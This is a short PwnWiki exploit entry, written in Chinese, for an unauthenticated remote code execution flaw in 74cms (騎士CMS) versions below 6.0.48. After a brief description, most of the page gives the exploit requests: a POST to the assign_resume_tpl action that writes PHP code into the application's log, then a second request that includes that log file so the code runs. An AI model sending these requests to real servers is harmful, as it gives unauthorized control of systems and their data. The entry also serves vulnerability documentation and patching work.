騎士CMS模版註入 &文件包含getshell漏洞
From PwnWiki
漏洞描述
騎士cms人才系統,是一項基於PHP+MYSQL為核心開發的一套免費 + 開源專業人才網站系統。軟件具執行效率高、模板自由切換、後台管理功能方便等諸多優秀特點。
騎士 CMS 官方發布安全更新,修復了一處遠程代碼執行漏洞。由於騎士 CMS 某些函數存在過濾不嚴格,攻擊者通過構造惡意請求,配合文件包含漏洞可在無需登錄的情況下執行任意代碼,控制服務器。
影響範圍
騎士 CMS < 6.0.48
漏洞利用
使用火狐hackbar發送POST:
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>
可以看到日誌記錄。
包含這條日誌,注意路徑和日誌名稱:
http://192.168.31.61/upload/index.php?m=home&a=assign_resume_tpl
variable=1&tpl=data/Runtime/Logs/Home/21_02_05.log
